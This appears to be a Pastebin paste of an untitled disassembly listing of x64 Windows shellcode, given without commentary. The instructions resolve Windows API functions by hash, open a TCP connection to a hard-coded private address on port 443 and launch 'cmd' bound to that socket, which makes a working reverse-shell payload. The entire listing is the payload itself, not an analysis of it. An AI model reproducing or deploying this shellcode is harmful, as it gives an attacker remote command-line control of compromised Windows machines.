API tools faq
paste
Advertisement
Sweetening

Untitled

Sweetening
Aug 10th, 2023
34
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.86 KB | None | 0 0
raw download clone embed print report
  1. 0x0000000000000000: FC cld
  2. 0x0000000000000001: 48 83 E4 F0 and rsp, 0xfffffffffffffff0
  3. 0x0000000000000005: E8 C0 00 00 00 call 0xca
  4. 0x000000000000000a: 41 51 push r9
  5. 0x000000000000000c: 41 50 push r8
  6. 0x000000000000000e: 52 push rdx
  7. 0x000000000000000f: 51 push rcx
  8. 0x0000000000000010: 56 push rsi
  9. 0x0000000000000011: 48 31 D2 xor rdx, rdx
  10. 0x0000000000000014: 65 48 8B 52 60 mov rdx, qword ptr gs:[rdx + 0x60]
  11. 0x0000000000000019: 48 8B 52 18 mov rdx, qword ptr [rdx + 0x18]
  12. 0x000000000000001d: 48 8B 52 20 mov rdx, qword ptr [rdx + 0x20]
  13. 0x0000000000000021: 48 8B 72 50 mov rsi, qword ptr [rdx + 0x50]
  14. 0x0000000000000025: 48 0F B7 4A 4A movzx rcx, word ptr [rdx + 0x4a]
  15. 0x000000000000002a: 4D 31 C9 xor r9, r9
  16. 0x000000000000002d: 48 31 C0 xor rax, rax
  17. 0x0000000000000030: AC lodsb al, byte ptr [rsi]
  18. 0x0000000000000031: 3C 61 cmp al, 0x61
  19. 0x0000000000000033: 7C 02 jl 0x37
  20. 0x0000000000000035: 2C 20 sub al, 0x20
  21. 0x0000000000000037: 41 C1 C9 0D ror r9d, 0xd
  22. 0x000000000000003b: 41 01 C1 add r9d, eax
  23. 0x000000000000003e: E2 ED loop 0x2d
  24. 0x0000000000000040: 52 push rdx
  25. 0x0000000000000041: 41 51 push r9
  26. 0x0000000000000043: 48 8B 52 20 mov rdx, qword ptr [rdx + 0x20]
  27. 0x0000000000000047: 8B 42 3C mov eax, dword ptr [rdx + 0x3c]
  28. 0x000000000000004a: 48 01 D0 add rax, rdx
  29. 0x000000000000004d: 8B 80 88 00 00 00 mov eax, dword ptr [rax + 0x88]
  30. 0x0000000000000053: 48 85 C0 test rax, rax
  31. 0x0000000000000056: 74 67 je 0xbf
  32. 0x0000000000000058: 48 01 D0 add rax, rdx
  33. 0x000000000000005b: 50 push rax
  34. 0x000000000000005c: 8B 48 18 mov ecx, dword ptr [rax + 0x18]
  35. 0x000000000000005f: 44 8B 40 20 mov r8d, dword ptr [rax + 0x20]
  36. 0x0000000000000063: 49 01 D0 add r8, rdx
  37. 0x0000000000000066: E3 56 jrcxz 0xbe
  38. 0x0000000000000068: 48 FF C9 dec rcx
  39. 0x000000000000006b: 41 8B 34 88 mov esi, dword ptr [r8 + rcx*4]
  40. 0x000000000000006f: 48 01 D6 add rsi, rdx
  41. 0x0000000000000072: 4D 31 C9 xor r9, r9
  42. 0x0000000000000075: 48 31 C0 xor rax, rax
  43. 0x0000000000000078: AC lodsb al, byte ptr [rsi]
  44. 0x0000000000000079: 41 C1 C9 0D ror r9d, 0xd
  45. 0x000000000000007d: 41 01 C1 add r9d, eax
  46. 0x0000000000000080: 38 E0 cmp al, ah
  47. 0x0000000000000082: 75 F1 jne 0x75
  48. 0x0000000000000084: 4C 03 4C 24 08 add r9, qword ptr [rsp + 8]
  49. 0x0000000000000089: 45 39 D1 cmp r9d, r10d
  50. 0x000000000000008c: 75 D8 jne 0x66
  51. 0x000000000000008e: 58 pop rax
  52. 0x000000000000008f: 44 8B 40 24 mov r8d, dword ptr [rax + 0x24]
  53. 0x0000000000000093: 49 01 D0 add r8, rdx
  54. 0x0000000000000096: 66 41 8B 0C 48 mov cx, word ptr [r8 + rcx*2]
  55. 0x000000000000009b: 44 8B 40 1C mov r8d, dword ptr [rax + 0x1c]
  56. 0x000000000000009f: 49 01 D0 add r8, rdx
  57. 0x00000000000000a2: 41 8B 04 88 mov eax, dword ptr [r8 + rcx*4]
  58. 0x00000000000000a6: 48 01 D0 add rax, rdx
  59. 0x00000000000000a9: 41 58 pop r8
  60. 0x00000000000000ab: 41 58 pop r8
  61. 0x00000000000000ad: 5E pop rsi
  62. 0x00000000000000ae: 59 pop rcx
  63. 0x00000000000000af: 5A pop rdx
  64. 0x00000000000000b0: 41 58 pop r8
  65. 0x00000000000000b2: 41 59 pop r9
  66. 0x00000000000000b4: 41 5A pop r10
  67. 0x00000000000000b6: 48 83 EC 20 sub rsp, 0x20
  68. 0x00000000000000ba: 41 52 push r10
  69. 0x00000000000000bc: FF E0 jmp rax
  70. 0x00000000000000be: 58 pop rax
  71. 0x00000000000000bf: 41 59 pop r9
  72. 0x00000000000000c1: 5A pop rdx
  73. 0x00000000000000c2: 48 8B 12 mov rdx, qword ptr [rdx]
  74. 0x00000000000000c5: E9 57 FF FF FF jmp 0x21
  75. 0x00000000000000ca: 5D pop rbp
  76. 0x00000000000000cb: 49 BE 77 73 32 5F 33 32 00 00 movabs r14, 0x32335f327377
  77. 0x00000000000000d5: 41 56 push r14
  78. 0x00000000000000d7: 49 89 E6 mov r14, rsp
  79. 0x00000000000000da: 48 81 EC A0 01 00 00 sub rsp, 0x1a0
  80. 0x00000000000000e1: 49 89 E5 mov r13, rsp
  81. 0x00000000000000e4: 49 BC 02 00 01 BB C0 A8 38 66 movabs r12, 0x6638a8c0bb010002
  82. 0x00000000000000ee: 41 54 push r12
  83. 0x00000000000000f0: 49 89 E4 mov r12, rsp
  84. 0x00000000000000f3: 4C 89 F1 mov rcx, r14
  85. 0x00000000000000f6: 41 BA 4C 77 26 07 mov r10d, 0x726774c
  86. 0x00000000000000fc: FF D5 call rbp
  87. 0x00000000000000fe: 4C 89 EA mov rdx, r13
  88. 0x0000000000000101: 68 01 01 00 00 push 0x101
  89. 0x0000000000000106: 59 pop rcx
  90. 0x0000000000000107: 41 BA 29 80 6B 00 mov r10d, 0x6b8029
  91. 0x000000000000010d: FF D5 call rbp
  92. 0x000000000000010f: 50 push rax
  93. 0x0000000000000110: 50 push rax
  94. 0x0000000000000111: 4D 31 C9 xor r9, r9
  95. 0x0000000000000114: 4D 31 C0 xor r8, r8
  96. 0x0000000000000117: 48 FF C0 inc rax
  97. 0x000000000000011a: 48 89 C2 mov rdx, rax
  98. 0x000000000000011d: 48 FF C0 inc rax
  99. 0x0000000000000120: 48 89 C1 mov rcx, rax
  100. 0x0000000000000123: 41 BA EA 0F DF E0 mov r10d, 0xe0df0fea
  101. 0x0000000000000129: FF D5 call rbp
  102. 0x000000000000012b: 48 89 C7 mov rdi, rax
  103. 0x000000000000012e: 6A 10 push 0x10
  104. 0x0000000000000130: 41 58 pop r8
  105. 0x0000000000000132: 4C 89 E2 mov rdx, r12
  106. 0x0000000000000135: 48 89 F9 mov rcx, rdi
  107. 0x0000000000000138: 41 BA 99 A5 74 61 mov r10d, 0x6174a599
  108. 0x000000000000013e: FF D5 call rbp
  109. 0x0000000000000140: 48 81 C4 40 02 00 00 add rsp, 0x240
  110. 0x0000000000000147: 49 B8 63 6D 64 00 00 00 00 00 movabs r8, 0x646d63
  111. 0x0000000000000151: 41 50 push r8
  112. 0x0000000000000153: 41 50 push r8
  113. 0x0000000000000155: 48 89 E2 mov rdx, rsp
  114. 0x0000000000000158: 57 push rdi
  115. 0x0000000000000159: 57 push rdi
  116. 0x000000000000015a: 57 push rdi
  117. 0x000000000000015b: 4D 31 C0 xor r8, r8
  118. 0x000000000000015e: 6A 0D push 0xd
  119. 0x0000000000000160: 59 pop rcx
  120. 0x0000000000000161: 41 50 push r8
  121. 0x0000000000000163: E2 FC loop 0x161
  122. 0x0000000000000165: 66 C7 44 24 54 01 01 mov word ptr [rsp + 0x54], 0x101
  123. 0x000000000000016c: 48 8D 44 24 18 lea rax, [rsp + 0x18]
  124. 0x0000000000000171: C6 00 68 mov byte ptr [rax], 0x68
  125. 0x0000000000000174: 48 89 E6 mov rsi, rsp
  126. 0x0000000000000177: 56 push rsi
  127. 0x0000000000000178: 50 push rax
  128. 0x0000000000000179: 41 50 push r8
  129. 0x000000000000017b: 41 50 push r8
  130. 0x000000000000017d: 41 50 push r8
  131. 0x000000000000017f: 49 FF C0 inc r8
  132. 0x0000000000000182: 41 50 push r8
  133. 0x0000000000000184: 49 FF C8 dec r8
  134. 0x0000000000000187: 4D 89 C1 mov r9, r8
  135. 0x000000000000018a: 4C 89 C1 mov rcx, r8
  136. 0x000000000000018d: 41 BA 79 CC 3F 86 mov r10d, 0x863fcc79
  137. 0x0000000000000193: FF D5 call rbp
  138. 0x0000000000000195: 48 31 D2 xor rdx, rdx
  139. 0x0000000000000198: 48 FF CA dec rdx
  140. 0x000000000000019b: 8B 0E mov ecx, dword ptr [rsi]
  141. 0x000000000000019d: 41 BA 08 87 1D 60 mov r10d, 0x601d8708
  142. 0x00000000000001a3: FF D5 call rbp
  143. 0x00000000000001a5: BB F0 B5 A2 56 mov ebx, 0x56a2b5f0
  144. 0x00000000000001aa: 41 BA A6 95 BD 9D mov r10d, 0x9dbd95a6
  145. 0x00000000000001b0: FF D5 call rbp
  146. 0x00000000000001b2: 48 83 C4 28 add rsp, 0x28
  147. 0x00000000000001b6: 3C 06 cmp al, 6
  148. 0x00000000000001b8: 7C 0A jl 0x1c4
  149. 0x00000000000001ba: 80 FB E0 cmp bl, 0xe0
  150. 0x00000000000001bd: 75 05 jne 0x1c4
  151. 0x00000000000001bf: BB 47 13 72 6F mov ebx, 0x6f721347
  152. 0x00000000000001c4: 6A 00 push 0
  153. 0x00000000000001c6: 59 pop rcx
  154. 0x00000000000001c7: 41 89 DA mov r10d, ebx
  155. 0x00000000000001ca: FF D5 call rbp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!